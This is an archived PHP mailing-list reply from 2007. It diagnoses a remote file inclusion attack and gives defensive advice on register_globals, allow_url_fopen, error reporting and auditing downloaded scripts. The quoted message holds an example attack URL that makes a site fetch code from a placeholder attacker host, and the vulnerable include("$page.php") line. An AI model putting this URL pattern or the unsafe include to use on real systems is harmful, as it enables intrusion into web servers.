RE: [PHP] Re: Question on virus/worms

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



> -----Message d'origine-----
> De : Stut [mailto:stuttle@xxxxxxxxx] 
> Envoyé : vendredi 2 mars 2007 20:23
> À : Seak, Teng-Fong
> Cc : php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx
> Objet : Re: [PHP] Re: Question on virus/worms
> 
> Seak, Teng-Fong wrote:
> >     But after I've spent some time reading the log files, 
> I've finally 
> > found out how the hackers managed to achieve worm infiltration.
> > 
> >     Actually, they're using an URL like this:
> > 
> http://my-domain.com/index.php?page=http://hacker-domain.com/s
> ome-worm-file.txt?
*smirk*
> > 
> >     And the some-worm-file.txt file contains some PHP code, 
> while my 
> > index.php contains this instruction:
> > include("$page.php");

This one line brings up two known php coding security issues, learn about
them on http://phpsec.org

> > 
> >     This is enough to make infiltration possible!  IMO, this 
> > instruction is supposed to be used like this, isn't it?  

NO it is not! See above..

> >So this is 
> > obviously a PHP security loophole 
YES! Learn about register_globals, allow_url_fopen, include()

Infact go learn PHP before blindly running scripts in a production
environment! Or if you really don't want too learn php at least subscribe to
bugtraq mailing list and go through the archive to see if the script you
want to run has a security history, see if they follow up on the issues or
just "ignore" the issues, and keep informed to see if any new issues have
been brought to hand.
 
> >and I don't see how the "poorly 
> > written scripts" can help anything unless a totally rewrite!

Not neccassarily a total rewrite, try implementing some functions to
retrieve/filtre your $_GET $_POST data, turn off register_globals, replace
all variables relying on register globals with your newly implemented
functions.. Use regular expressions to find the data that needs to be
changed in your scripts..

> >  And 
> > there's no "poor server security" that I can see.

I think its time for you to take a pause on installing these scripts you are
downloading and read up on the php.ini configuration file, also do a search
on php history and security. Follow the changes in different php versions
aswell their are a lot of hints as to what "default" values have changed to
improve chances of "poorly written scripts" not being vulnerable. BUT unless
you understnad the issues involved these default values are a false excuse
for thinking your scripts is "secure". (ie upgrading to php5: you did it, it
solved your problem, but you still don't know why because you don't know
what value was changed in your php configuration)

Those few steps will definately be able to give you an idea of what kind of
security issues exist, eventually how they are circumvented, and ideas on
how you can improve your existing scripts to avoid these issues.

Once you are comfortable with this, before you use a script downloaded from
the inet in a production environment, go through the code and make sure you
don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't
related to the scripts original use). Also a good thing to look out for is
scripts that run with register_globals = off in the php.ini this at least
ensures "forced" good practice in coding (this does not mean one cannot code
well with register_globals = on, it just releaves a potential security issue
for the programmer and force him to call url passed variable in a proper
manner ie: using PHP Super Globals, to be able to use them)

> 
> >     I've installed PHP5 and the problem seems fixed.  However, PHP 
> > writes out where the problem occurs!  Indeed, the hacker 
> could read a 
> > line like this:
> > Warning: include() [function.include]: URL file-access is 
> disabled in 
> > the server configuration in C:\Inetpub\wwwroot\index.php on line X
> > 
> >     I don't want them (the hackers) to be able to read this either. 
> > That gives too much information about my server's file system.  How 
> > can I stop that?

Once again learn about php.ini and how it works (re: Stut mentioned -
error_reporting).


> >     By the way, I know there're still a lot of servers out 
> there still 
> > using PHP4.  Is this vulnerability a known bug?  At least, I'm not 
> > aware of that before!
> 
> It's not a bug. It will never be a bug. Yes PHP5 (I believe 
> it's 5.2+) introduces the ability to turn off the ability to 
> prevent this issue, but it's still badly written code. Stop 
> blaming the tool, start blaming the mirror image and start 
> learning how to code defensively.

Can't agree more..

Don't "think" youre secure and live with it, someday it will bite you when
you least expect it.. Make it a part of your everyday work to constantly
reduce the risk of unwanted "intrusions"..

Regards,

Tim

-- 
PHP Windows Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[Index of Archives]     [PHP Home]     [PHP Users]     [PHP Database Programming]     [PHP Install]     [Kernel Newbies]     [Yosemite Forum]     [PHP Books]

  Powered by Linux